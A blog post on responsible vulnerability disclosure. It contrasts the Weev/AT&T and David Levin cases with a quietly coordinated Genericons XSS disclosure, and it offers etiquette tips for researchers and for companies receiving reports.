The security community has a lot of perks, low unemployment, lots of excitement, new challenges every day, and an endless supply of things to learn. However not everyone likes what we do and not everyone likes to listen to us, ever. There are so many bugs out there that a large amount of us like to find them in our spare time. But what do we do when we discover one? Do we exploit it and grab the loot? Be happy with our discovery and move on to the next finding? Or send it over to the owners with the details? The responsible move is door number three.

Keep in mind that even if you are responsible and just trying to help not everyone will be happy about you poking around their systems. Neither will the law in some cases. This presents a couple of challenges from both sides.

Disclosures Gone Wrong

13uayk

Weev is a convicted researcher that is part of a group called Goatse Security. In 2010 they discovered a flaw in the AT&T website that allowed an attacker to harvest user data. How it worked in short is when an iPad or other device used the sign up form a unique identifier was sent by the device which then auto populated the user data into the site. You could spoof this request and easily grab the information of a user, in this case it was email addresses.

At this time standard practice was disclosure to the media with evidence proving the vulnerability. Gawker had received the information and disclosed the issue to the world before AT&T was made aware of it. Soon enough authorities got wind of it and eventually charged him with one count of conspiracy to access a computer without authorization and one count of fraud. Weev was sentenced in March of 2013 and then released in April of 2014 after the ruling was vacated.

It was a lengthy battle for Weev and he spent a good amount of time in jail for letting people know that AT&T was improperly handling their data. In my opinion Weev made one big mistake overall, and that was not informing AT&T first about the issue then giving them adequate time to remediate it. In essence you could compare this to seeing that the local bank keeps the back door unlocked and then screaming to the whole town about it. Someone malicious is bound to try to use it to their advantage.

Should he have gone to jail for his actions? I’m not so sure, he disclosed a flaw that can expose email addresses which is easily accessible with a little bit of digging through legal channels. This is not exactly private information in this day and age, we all get plenty of spam mail already. However the word is that he leaked EVERY email address of those stored in the AT&T database, this sounds like one step too far. First for him accessing all of that data and then second for leaking it to third parties.

Consumers have a right to know about a flaw and potential compromise of their data, but these situations are delicate. Companies see it as an attack no matter if you have the best intentions, you have to be responsible about it.

There is also a recent one that you can review here, David Levin discovered a SQL injection vulnerability in the US election website that allowed him to dump the tables. He was jailed for about six hours then let go on bail, but again it seems that David stepped a bit too far. Once he discovered the SQL Injection he started going through the tables and then posted a youtube video about. You can argue here that he had to check the passwords however for hashing and had a responsibility to do so. Logging into the site with the admin credentials though, probably not a good idea….or posting it publicly before a fix. He did admit to getting a little carried away and seems to have learned from the experience. It did however create some press for his firm, maybe it was a publicity stunt as well? This is something to ponder….

When Things Go Right

This is a tough one, you never read much in the media of when a disclosure goes right, it doesn’t create the hits or headlines like an arrest. Also it is really uneventful and nobody is yelling in excitement about the vulnerability being fixed. There is a decent example in a wordpress issue discovered last year. David Dede discovered that any WordPress theme or plugin that uses the genericons package could be exploited through Cross Site Scripting.

David eventually announced it to the world but not before quietly notifying hosting vendors and giving them the chance to fix it. WordPress itself was included on this and they had a blog post out to detail the available patches. In this case David kept the information close to his chest and once the fixes were done then he went public with it. He gained the respect of the company and also got the exposure he wanted to promote himself.

13uawt

Responsible coordinated disclosure, in some cases all it takes is remembering the responsible part. This puts the researcher in a positive light and will make others want to work with you going forward.

Progress

Now not everyone is living in the stone age and some of our governments are taking very proactive approaches to responsible vulnerability disclosure. The dutch government has taken steps to outline responsible disclosure and what it entails. It does not completely absolve researchers from legal action but it does set some good guidelines. You can read about it here, TL:DR that as long as a researcher does not go beyond what is necessary to prove a vulnerability this should be deemed as acceptable. Additionally the researcher should report it directly to the company first before a public disclosure. It isn’t law but it builds a framework we can work off of.

On top of this a lot of companies now exist that are helping researchers to legally disclose issues such as bugcrowd.com or openbugbounty.org. These companies team up with others to setup bug bounty programs, testing guidelines and disclosure processes. Companies in general should really utilize these resources as crowd sourced pen testing can strengthen your security program.

Todo and Not Todo

Not everyone will agree with the next steps and I know this is a hotly debated topic but this what I have seen through my own experience on what works.

Researcher – If you are on the disclosure side and sending an issue to a company here are some tips to help with your work.

  • Remain anonymous, this can be accomplished by using a vpn, generic email, and other methods (there are a lot). This is important as even if you did everything legally the initial disclosure could go badly. Especially if the company does not have a bug bounty program in place.
  • Don’t break anything and try not to steal anything, this is a good way to land yourself in jail or worse. In some cases a test will break or expose data and this can’t be helped, keep it to yourself and if you must share it as proof then only send it to the company.
  • If there is no bug bounty program don’t ask for compensation until you feel out the company. Starting off an email with “Hi i found a bug, i’ll give you the details if you pay me k thanks?” sounds more like blackmail to a company then anything else. Be respectful and if you don’t see a bug bounty program listed then don’t push the subject. Most of the people receiving these reports are also security professionals and would happily send you something for your time if they can.
  • Do your due diligence and make the report easy to understand, a proof of concept and screenshots go a long way. If you provide remediation guidance this is also a big plus! There are too many instances of people saying they are a researcher and giving generic proof or guidance. Identify the affected cookies, parameters, pages, form etc. They won’t take you seriously unless you can prove it, I know I won’t.

Company – Being on the receiving end of reports is tough as well, but it can be a valuable resource for your company.

  • Don’t kill the messenger, your first reaction might be to get angry at this person who was testing your systems and found a weakness. Remember it is better for someone to report it to you then you getting owned because of ignorance. Assume they are a good person just trying to help and review the results.
  • Do your own checks against what was reported, do not just take the researchers word for it. You want to be sure this is a valid issue before pushing it to the right teams. Also as this is your company you ultimately decide the amount of risk an issue presents.
  • If you can please do thank the researcher, even if it is just a hall of fame or a tshirt. They put some effort into doing this work and everyone’s time is valuable. If you cannot reward them then maybe consider implementing a bounty program, and a hall of fame is easy to add!

If you want to get more involved with this type of work there are many legal avenues. Keep it responsible and remember you represent the community when you perform these tests.

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Category

Information Security Profession, Security Research

Tags

,